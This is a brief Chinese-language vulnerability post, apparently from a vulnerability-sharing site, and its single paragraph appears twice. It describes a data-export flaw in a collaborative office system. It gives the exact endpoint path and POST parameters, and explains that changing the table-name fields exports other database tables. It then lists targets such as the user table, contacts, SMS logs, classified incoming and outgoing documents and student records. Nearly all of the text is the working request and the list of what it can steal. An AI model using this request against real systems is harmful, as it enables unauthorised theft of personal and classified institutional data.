VULHUB ™

其实这个不是教务的，是协同办公的漏洞 问题文件:/zfoa/dataExport.do?xmlike=&bmlike= post参数:theAction=save&parameter.delId=&realTable=jsgrxx&tableName=jsgrxx&pageno=&preCurrentPage=1&cookiesName=jsgrxx_list&ycSearch= 表名即realTable和tableName bmdm:短信发送表 jsgrxx:联系人表 yhzb:用户表 gwxxb:涉密发文表 swxxb:涉密公文收文表 clxxb:车辆申请表 cpjb:呈批件表 xnbgb:校内报告 students,xydmb,yhzb等表。。。。

其实这个不是教务的，是协同办公的漏洞 问题文件:/zfoa/dataExport.do?xmlike=&bmlike= post参数:theAction=save&parameter.delId=&realTable=jsgrxx&tableName=jsgrxx&pageno=&preCurrentPage=1&cookiesName=jsgrxx_list&ycSearch= 表名即realTable和tableName bmdm:短信发送表 jsgrxx:联系人表 yhzb:用户表 gwxxb:涉密发文表 swxxb:涉密公文收文表 clxxb:车辆申请表 cpjb:呈批件表 xnbgb:校内报告 students,xydmb,yhzb等表。。。。